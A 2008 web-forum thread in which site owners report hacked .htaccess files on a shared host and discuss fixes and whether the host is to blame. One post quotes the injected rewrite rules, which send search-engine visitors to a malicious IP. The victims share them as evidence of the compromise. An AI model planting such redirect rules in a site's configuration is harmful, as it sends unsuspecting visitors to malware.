[Fixed] .HTACCESS file integrity compromised. Content wiped and replaced

Sad news!  :-[

See ZAP’s post above. + http://modxcms.com/forums/index.php/topic,30875.0.html

Funny thing is that both the laptopbattery + itconsmedia site are using the same hosting company... and if you visit their site, the first thing you notice is their collection of "hacker-safe" / "trusted" / "safe" icons. Only goes to show that this is mostly just marketing, not much else...

Could it be the host that’s the hoax here?

Quote from: mrhaw at Dec 10, 2008, 02:21 PM

Could it be the host that’s the hoax here?

That is certainly also a possibility. I don’t know anything about those hosts, but it would be worth investigating. Around the holidays all sorts of evildoers come out of the woodwork.

Quote from: daysandy1 at Dec 10, 2008, 01:53 PM

i have the same problem.
my own .htaccess file has been changed to:
======================================
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.205/in.html?s=xx [R,L]
======================================

Then i upload my backup .htaccess file to cover the changed .htaccess.
But two or three days later, the .htaccess will be changed again.
I don’t know how to avoid the changes, any help?

As it was mentioned above, a good fix would be to first make sure that any of your computers that have your host’s information are clean. Then, change all your passwords including the FTP password and your MODx passwords and your Control Panel password. You should then replace your .htaccess with a new and clean file.

It should normally help. The best remedy is to keep your guard up. If you encounter the problem numerous times, you should consider shopping around.

Good luck buddy

Quote from: Seanax at Dec 10, 2008, 03:13 AM

I have also encountered the problem, my .Htaccess set to 644, still being revised
I changed to 444 now. Hope that will not be revised once again

Thank you for sharing.
I think this is ixwebhositng server security problems,
a large number of my friends who use Ixwebhositng have appeared in this issue.

My website is http://laptopsbattery.us, when somebody click my site from google or yahoo,the page will be rewrie to http:// 89.28.13.205/ this site is a virus site
I hate hacker

It’s official, IX Webhosting has been hacked. Many other users have the same problem check out this post :
http://blog.riskythinking.com/2008/11/my-website-got-hacked.html
What seems funny is that they recommend a certain malware removal tool that apparently is not free after all. Why not what many objective companies do and recommend a list of ood software instead of just one that many people never heard of before. It all seems phishy; the hoax theory is very plausible and it becomes true, they’re gonna lose all my clients accounts with them and I’ll do my best to make this viral.

From that blog:

Interestingly, some of the newly created directories and files cannot be deleted using web shell or FTP. The IX person I talked to said they also could not delete them (?), and for me to just do a ticket . . . then he gave me a link to the Antivirus 2009 malware removal instructions saying any problems originated on my desktop. Big help. As much as I hate the pain of switching hosts, it might be time.

If files are being created or edited that you can’t modify, then the hacker has higher level (root) access than your account does. Which to me would rule out the possibility of your login credentials having been stolen or phished as well as MODx or any other scripts having been hacked. I would switch hosts immediately, especially if they’re unwilling to even acknowledge a problem on their end.

Thanks Treigh and ZAP


I have set 644 into 444, Up to now, it has not been modified by hackers
I will continue to monitor,

if anyone aware of the Web site http://laptopsbattery.us was changed, please inform me.

Quote from: ganeshXL at Dec 10, 2008, 02:13 PM

Funny thing is that both the laptopbattery + itconsmedia site are using the same hosting company... and if you visit their site, the first thing you notice is their collection of "hacker-safe" / "trusted" / "safe" icons. Only goes to show that this is mostly just marketing, not much else...

You are right,and you are so circumspective.
As I know,most laptop batteries sites use ixwebhosting host service